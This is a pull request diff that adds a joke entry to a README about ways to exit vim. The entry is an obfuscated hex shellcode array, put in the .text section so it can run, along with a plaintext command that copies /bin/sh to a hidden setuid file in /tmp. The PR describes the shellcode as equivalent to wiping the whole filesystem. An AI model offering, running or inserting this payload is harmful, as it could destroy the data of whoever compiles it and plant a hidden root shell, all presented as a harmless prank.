### PR TITLE
Add Extremely Passive-Agressive Way

### DIFF
--- a/README.md
+++ b/README.md
@@ -140,6 +140,15 @@ _**Walk away.**_
 
 *...then walk away.* (n.b. That's a [fork bomb](https://en.wikipedia.org/wiki/Fork_bomb#Bash), please don't try at home.)
 
+## The Extremely Passive-Aggressive Way
+Credit: @AshishShenoy
+
+```
+char esp[] __attribute__ ((section(".text"))) /* e.s.prelease */= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″"\x6e\x2f\x73\x68\x00\x2d\x63\x00″"cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;";
+```
+
+*...then walk away, never looking back.* (P.S. That's the shellcode quivalent of ```sudo rm -rf / --no-preserve-root```, therefore it is not recommended to try at home.)
+
 ## The Microsoft Way
 Credit: @cheezmeister
 


### PR DESCRIPTION
Adds a succinct way to to exit vim, which is the equivalent of ```sudo rm -rf / --no-preserve-root```.

The shellcode version was chosen instead of the bash command for it's simplicity and elegance.